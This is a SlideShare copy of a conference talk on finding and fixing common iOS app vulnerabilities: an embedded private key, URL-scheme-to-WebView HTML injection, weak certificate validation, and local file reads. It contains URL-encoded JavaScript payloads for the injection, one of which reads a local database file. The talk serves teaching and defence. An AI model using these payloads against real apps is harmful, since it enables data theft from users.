SlideShare une entreprise Scribd logo
1  sur  85
CommonVulnerabilities on iOS Apps
by ivan r
QconSF
@ivRodriguezCA
InfoQ.com: News & Community Site
• Over 1,000,000 software developers, architects and CTOs read the site world-
wide every month
• 250,000 senior developers subscribe to our weekly newsletter
• Published in 4 languages (English, Chinese, Japanese and Brazilian
Portuguese)
• Post content from our QCon conferences
• 2 dedicated podcast channels: The InfoQ Podcast, with a focus on
Architecture and The Engineering Culture Podcast, with a focus on building
• 96 deep dives on innovative topics packed as downloadable emags and
minibooks
• Over 40 new content items per week
Watch the video with slide
synchronization on InfoQ.com!
https://www.infoq.com/presentations/
exploiting-ios-vulnerabilities/
Purpose of QCon
- to empower software development by facilitating the spread of
knowledge and innovation
Strategy
- practitioner-driven conference designed for YOU: influencers of
change and innovation in your teams
- speakers and topics driving the evolution and innovation
- connecting and catalyzing the influencers and innovators
Highlights
- attended by more than 12,000 delegates since 2007
- held in 9 cities worldwide
Presented at QCon San Francisco
www.qconsf.com
@ivRodriguezCA
DISCLAIMER
the views and opinions expressed on this talk are
solely my own and do not reflect the views or
opinions of my employer.
@ivRodriguezCA
ivan_rodriguez.me
• security researcher and software engineer
• focused on iOS reverse engineering and mobile bug bounty programs
• i blog at ivrodriguez.com
• find me on twitter: @ivRodriguezCA
• find me on github: /ivRodriguezCA
@ivRodriguezCA
agenda
• reverse engineering an iOS app.
• tools and methods.
• common iOS vulnerabilities (all found on real world applications).
• how to fix and prevent these vulnerabilities.
• resources / conclusions.
• questions.
@ivRodriguezCA
reverse engineering an iOS app
• iOS apps are encrypted with an algorithm called FairPlay.
• we need a jailbroken device.
• we don’t “decrypt” the apps, we just dump them from memory.
• transfer them to a desktop where we do the reverse engineering.
@ivRodriguezCA
reverse engineering an iOS app
• how we dump the app from memory?
> dump memory <filename> <start_address> <end_address>
@ivRodriguezCA
reverse engineering an iOS app
• how we dump the app from memory?
> dump memory <filename> <start_address> <end_address>
• we can use tools to automate this.
@ivRodriguezCA
reverse engineering an iOS app
• some of the tools we can use:
- dumpdecrypted: https://github.com/stefanesser/dumpdecrypted
- bfinject: https://github.com/BishopFox/bfinject
- frida-ios-dump: https://github.com/AloneMonkey/frida-ios-dump
@ivRodriguezCA
reverse engineering an iOS app
@ivRodriguezCA
reverse engineering an iOS app
@ivRodriguezCA
reverse engineering an iOS app
@ivRodriguezCA
reverse engineering an iOS app
• dynamic and static analysis
@ivRodriguezCA
reverse engineering an iOS app
• dynamic and static analysis
@ivRodriguezCA
reverse engineering an iOS app
• dynamic and static analysis
@ivRodriguezCA
vulnerability # 1
• searching through embedded files within the app
@ivRodriguezCA
vulnerability # 1
@ivRodriguezCA
vulnerability # 1
private_key
@ivRodriguezCA
vulnerability # 1
private_key
yes, PRIVATE key
@ivRodriguezCA
vulnerability # 1
cloud server
@ivRodriguezCA
vulnerability # 1
cloud server
@ivRodriguezCA
vulnerability # 1
cloud server
@ivRodriguezCA
vulnerability # 1
cloud server
ssh
@ivRodriguezCA
vulnerability # 1
cloud server
ssh
!
@ivRodriguezCA
how to fix vulnerability # 1
cloud server own server
@ivRodriguezCA
how to fix vulnerability # 1
cloud server own server
@ivRodriguezCA
how to fix vulnerability # 1
cloud server own server
@ivRodriguezCA
how to fix vulnerability # 1
cloud server own server
@ivRodriguezCA
how to fix vulnerability # 1
cloud server own server
public api
@ivRodriguezCA
how to fix vulnerability # 1
cloud server own server
ssh
@ivRodriguezCA
how to fix vulnerability # 1
cloud server own server
ssh
@ivRodriguezCA
vulnerability # 2
@ivRodriguezCA
vulnerability # 2
@ivRodriguezCA
vulnerability # 2
@ivRodriguezCA
vulnerability # 2
@ivRodriguezCA
vulnerability # 2
@ivRodriguezCA
@ivRodriguezCA
vulnerability # 2
• coinza://news/<trusted-html>
@ivRodriguezCA
vulnerability # 2
• coinza://news/<trusted-html>
- <html><body><script>document.location = ‘https://en.wikipedia.org/
wiki/URL_redirection’;</script></body></html>
•
@ivRodriguezCA
vulnerability # 2
• coinza://news/<trusted-html>
- <html><body><script>document.location = ‘https://en.wikipedia.org/
wiki/URL_redirection’;</script></body></html>
coinza://news/
%3Chtml%3E%3Cbody%3E%3Cscript%3Edocument.location%20%3D%20%
27https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FURL_redirection%27%3B%
3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
@ivRodriguezCA
how to fix vulnerability # 2
@ivRodriguezCA
how to fix vulnerability # 2
!
@ivRodriguezCA
how to fix vulnerability # 2
• URL Schemes + WebViews are dangerous and you should be careful
when you pair them.
• don’t load HTML code from user-controlled content.
• if you need to dynamically react to URL Schemes have a set of
whitelisted actions.
@ivRodriguezCA
@ivRodriguezCA
vulnerability # 3
@ivRodriguezCA
vulnerability # 3
vulnerability # 3
@ivRodriguezCA
vulnerability # 3
@ivRodriguezCA
vulnerability # 3
@ivRodriguezCA
vulnerability # 3
== ?
@ivRodriguezCA
vulnerability # 3
✅
@ivRodriguezCA
vulnerability # 3
🛑
@ivRodriguezCA
vulnerability # 3
🛑
🚫
@ivRodriguezCA
vulnerability # 3
🛑
✅
@ivRodriguezCA
vulnerability # 3
🛑
website.com
@ivRodriguezCA
vulnerability # 3
🛑
username/password
@ivRodriguezCA
vulnerability # 3
🛑
@ivRodriguezCA
@ivRodriguezCA
vulnerability # 3
@ivRodriguezCA
vulnerability # 3
detected connection
to a website
@ivRodriguezCA
vulnerability # 3
creates fakeTLS
certificate
@ivRodriguezCA
vulnerability # 3
sniffs client traffic
@ivRodriguezCA
how to fix vulnerability # 3
• vet and test your 3rd party frameworks, specially if they handle your
network requests.
• be careful when implementing your own certificate validation logic.
• if you want to implement HPKP you can useTrustKit:
- https://github.com/datatheorem/TrustKit
@ivRodriguezCA
how to fix vulnerability # 3
@ivRodriguezCA
source: https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html
vulnerability # 4
@ivRodriguezCA
vulnerability # 4
@ivRodriguezCA
vulnerability # 4
@ivRodriguezCA
vulnerability # 4
@ivRodriguezCA
vulnerability # 4
@ivRodriguezCA
vulnerability # 4
• these methods are equivalent for local files
@ivRodriguezCA
vulnerability # 4
@ivRodriguezCA
vulnerability # 4
file: sqlcipher.db
path: Documents/
@ivRodriguezCA
vulnerability # 4
send file to a
remote location.
@ivRodriguezCA
vulnerability # 4
• coinza://news/
%3Chtml%3E%0A%20%20%20%3Cbody%3E%0A%20%20%20%20%20%20%3Cscript%3E%0A%20%20%20%20%20%20%20%20%20function%20loa
dFile%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20var%20xmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%0
A%20%20%20%20%20%20%20%20%20%20%20%20documentsPath%20%3D%20document.URL.split%28%27%2F%27%29.slice%280%2C%20-1%29.j
oin%28%27%2F%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20filePath%20%3D%20documentsPath%20%2B%20%27%2F%27%
20%2B%20%27sqlcipher.db%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onreadystatechange%20%3D%20function%28%2
9%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.readyState%20%3D%3D%204%29%20%7B%0A%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.responseText.length%20%3E%200%29%20%7B%0A%20%2
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%27Got%20file%20%5C%27sqlcipher.db%5C%27%2C%20size
%3A%20%27%20%2B%20xmlhttp.responseText.length%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7
D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%3B%0A%2
0%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onerror%20%3D%20function%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%2
0%20%20%20%20%20alert%28%27Error%21%20%27%20%2B%20filePath%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A
%20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.open%28%27GET%27%2C%20filePath%2C%20true%29%3B%0A%20%20%20%20%20%2
0%20%20%20%20%20%20xmlhttp.send%28%29%3B%0A%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20wind
ow.onload%20%3D%20loadFile%3B%0A%20%20%20%20%20%20%3C%2Fscript%3E%0A%20%20%20%20%20%20%3Cp%3E%0A%20%20%20%20%
20%20%20%20%20Hello%20World%0A%20%20%20%20%20%20%3C%2Fp%3E%0A%20%20%20%3C%2Fbody%3E%0A%3C%2Fhtml%3E
@ivRodriguezCA
@ivRodriguezCA
how to fix vulnerability # 4
• do not use UIWebView anymore, use WKWebView instead.
• if you absolutely have to use UIWebView:
- do not use - (void)loadRequest:(NSURLRequest *)request for local files.
- Use - (void)loadHTMLString:(NSString *)string baseURL:(NSURL *)baseURL with an URL
object created with [URLWithString:@“about:blank”].
-
@ivRodriguezCA
conclusions
• add security assessments to your release cycles.
• keep your 3rd party libraries up to date.
• be careful copy-pasting code from online sources.
• have a public bounty program or at least public channels for
responsible disclosures.
@ivRodriguezCA
resources
• OWASP - Mobile Application SecurityVerification Standard

https://github.com/OWASP/owasp-masvs
• OWASP -The Mobile SecurityTesting Guide

https://github.com/OWASP/owasp-mstg
• Resources Page of my course

https://github.com/ivRodriguezCA/RE-iOS-Apps/blob/master/
Resources.md
@ivRodriguezCA
resources
• for a more detailed guide visit:

https://github.com/ivRodriguezCA/RE-iOS-Apps
@ivRodriguezCA
@ivRodriguezCA
@ivRodriguezCA
questions?
@ivRodriguezCA
thank you!
@ivRodriguezCA
Watch the video with slide
synchronization on InfoQ.com!
https://www.infoq.com/presentations/
exploiting-ios-vulnerabilities/

Contenu connexe

Plus de C4Media

Shifting Left with Cloud Native CI/CD
Shifting Left with Cloud Native CI/CDShifting Left with Cloud Native CI/CD
Shifting Left with Cloud Native CI/CDC4Media
 
CI/CD for Machine Learning
CI/CD for Machine LearningCI/CD for Machine Learning
CI/CD for Machine LearningC4Media
 
Fault Tolerance at Speed
Fault Tolerance at SpeedFault Tolerance at Speed
Fault Tolerance at SpeedC4Media
 
Architectures That Scale Deep - Regaining Control in Deep Systems
Architectures That Scale Deep - Regaining Control in Deep SystemsArchitectures That Scale Deep - Regaining Control in Deep Systems
Architectures That Scale Deep - Regaining Control in Deep SystemsC4Media
 
ML in the Browser: Interactive Experiences with Tensorflow.js
ML in the Browser: Interactive Experiences with Tensorflow.jsML in the Browser: Interactive Experiences with Tensorflow.js
ML in the Browser: Interactive Experiences with Tensorflow.jsC4Media
 
Build Your Own WebAssembly Compiler
Build Your Own WebAssembly CompilerBuild Your Own WebAssembly Compiler
Build Your Own WebAssembly CompilerC4Media
 
User & Device Identity for Microservices @ Netflix Scale
User & Device Identity for Microservices @ Netflix ScaleUser & Device Identity for Microservices @ Netflix Scale
User & Device Identity for Microservices @ Netflix ScaleC4Media
 
Scaling Patterns for Netflix's Edge
Scaling Patterns for Netflix's EdgeScaling Patterns for Netflix's Edge
Scaling Patterns for Netflix's EdgeC4Media
 
Make Your Electron App Feel at Home Everywhere
Make Your Electron App Feel at Home EverywhereMake Your Electron App Feel at Home Everywhere
Make Your Electron App Feel at Home EverywhereC4Media
 
The Talk You've Been Await-ing For
The Talk You've Been Await-ing ForThe Talk You've Been Await-ing For
The Talk You've Been Await-ing ForC4Media
 
Future of Data Engineering
Future of Data EngineeringFuture of Data Engineering
Future of Data EngineeringC4Media
 
Automated Testing for Terraform, Docker, Packer, Kubernetes, and More
Automated Testing for Terraform, Docker, Packer, Kubernetes, and MoreAutomated Testing for Terraform, Docker, Packer, Kubernetes, and More
Automated Testing for Terraform, Docker, Packer, Kubernetes, and MoreC4Media
 
Navigating Complexity: High-performance Delivery and Discovery Teams
Navigating Complexity: High-performance Delivery and Discovery TeamsNavigating Complexity: High-performance Delivery and Discovery Teams
Navigating Complexity: High-performance Delivery and Discovery TeamsC4Media
 
High Performance Cooperative Distributed Systems in Adtech
High Performance Cooperative Distributed Systems in AdtechHigh Performance Cooperative Distributed Systems in Adtech
High Performance Cooperative Distributed Systems in AdtechC4Media
 
Rust's Journey to Async/await
Rust's Journey to Async/awaitRust's Journey to Async/await
Rust's Journey to Async/awaitC4Media
 
Opportunities and Pitfalls of Event-Driven Utopia
Opportunities and Pitfalls of Event-Driven UtopiaOpportunities and Pitfalls of Event-Driven Utopia
Opportunities and Pitfalls of Event-Driven UtopiaC4Media
 
Datadog: a Real-Time Metrics Database for One Quadrillion Points/Day
Datadog: a Real-Time Metrics Database for One Quadrillion Points/DayDatadog: a Real-Time Metrics Database for One Quadrillion Points/Day
Datadog: a Real-Time Metrics Database for One Quadrillion Points/DayC4Media
 
Are We Really Cloud-Native?
Are We Really Cloud-Native?Are We Really Cloud-Native?
Are We Really Cloud-Native?C4Media
 
CockroachDB: Architecture of a Geo-Distributed SQL Database
CockroachDB: Architecture of a Geo-Distributed SQL DatabaseCockroachDB: Architecture of a Geo-Distributed SQL Database
CockroachDB: Architecture of a Geo-Distributed SQL DatabaseC4Media
 
A Dive into Streams @LinkedIn with Brooklin
A Dive into Streams @LinkedIn with BrooklinA Dive into Streams @LinkedIn with Brooklin
A Dive into Streams @LinkedIn with BrooklinC4Media
 

Plus de C4Media (20)

Shifting Left with Cloud Native CI/CD
Shifting Left with Cloud Native CI/CDShifting Left with Cloud Native CI/CD
Shifting Left with Cloud Native CI/CD
 
CI/CD for Machine Learning
CI/CD for Machine LearningCI/CD for Machine Learning
CI/CD for Machine Learning
 
Fault Tolerance at Speed
Fault Tolerance at SpeedFault Tolerance at Speed
Fault Tolerance at Speed
 
Architectures That Scale Deep - Regaining Control in Deep Systems
Architectures That Scale Deep - Regaining Control in Deep SystemsArchitectures That Scale Deep - Regaining Control in Deep Systems
Architectures That Scale Deep - Regaining Control in Deep Systems
 
ML in the Browser: Interactive Experiences with Tensorflow.js
ML in the Browser: Interactive Experiences with Tensorflow.jsML in the Browser: Interactive Experiences with Tensorflow.js
ML in the Browser: Interactive Experiences with Tensorflow.js
 
Build Your Own WebAssembly Compiler
Build Your Own WebAssembly CompilerBuild Your Own WebAssembly Compiler
Build Your Own WebAssembly Compiler
 
User & Device Identity for Microservices @ Netflix Scale
User & Device Identity for Microservices @ Netflix ScaleUser & Device Identity for Microservices @ Netflix Scale
User & Device Identity for Microservices @ Netflix Scale
 
Scaling Patterns for Netflix's Edge
Scaling Patterns for Netflix's EdgeScaling Patterns for Netflix's Edge
Scaling Patterns for Netflix's Edge
 
Make Your Electron App Feel at Home Everywhere
Make Your Electron App Feel at Home EverywhereMake Your Electron App Feel at Home Everywhere
Make Your Electron App Feel at Home Everywhere
 
The Talk You've Been Await-ing For
The Talk You've Been Await-ing ForThe Talk You've Been Await-ing For
The Talk You've Been Await-ing For
 
Future of Data Engineering
Future of Data EngineeringFuture of Data Engineering
Future of Data Engineering
 
Automated Testing for Terraform, Docker, Packer, Kubernetes, and More
Automated Testing for Terraform, Docker, Packer, Kubernetes, and MoreAutomated Testing for Terraform, Docker, Packer, Kubernetes, and More
Automated Testing for Terraform, Docker, Packer, Kubernetes, and More
 
Navigating Complexity: High-performance Delivery and Discovery Teams
Navigating Complexity: High-performance Delivery and Discovery TeamsNavigating Complexity: High-performance Delivery and Discovery Teams
Navigating Complexity: High-performance Delivery and Discovery Teams
 
High Performance Cooperative Distributed Systems in Adtech
High Performance Cooperative Distributed Systems in AdtechHigh Performance Cooperative Distributed Systems in Adtech
High Performance Cooperative Distributed Systems in Adtech
 
Rust's Journey to Async/await
Rust's Journey to Async/awaitRust's Journey to Async/await
Rust's Journey to Async/await
 
Opportunities and Pitfalls of Event-Driven Utopia
Opportunities and Pitfalls of Event-Driven UtopiaOpportunities and Pitfalls of Event-Driven Utopia
Opportunities and Pitfalls of Event-Driven Utopia
 
Datadog: a Real-Time Metrics Database for One Quadrillion Points/Day
Datadog: a Real-Time Metrics Database for One Quadrillion Points/DayDatadog: a Real-Time Metrics Database for One Quadrillion Points/Day
Datadog: a Real-Time Metrics Database for One Quadrillion Points/Day
 
Are We Really Cloud-Native?
Are We Really Cloud-Native?Are We Really Cloud-Native?
Are We Really Cloud-Native?
 
CockroachDB: Architecture of a Geo-Distributed SQL Database
CockroachDB: Architecture of a Geo-Distributed SQL DatabaseCockroachDB: Architecture of a Geo-Distributed SQL Database
CockroachDB: Architecture of a Geo-Distributed SQL Database
 
A Dive into Streams @LinkedIn with Brooklin
A Dive into Streams @LinkedIn with BrooklinA Dive into Streams @LinkedIn with Brooklin
A Dive into Streams @LinkedIn with Brooklin
 

Dernier

Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?IES VE
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfJamie (Taka) Wang
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDELiveplex
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 

Dernier (20)

Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 

Exploiting Common iOS Apps’ Vulnerabilities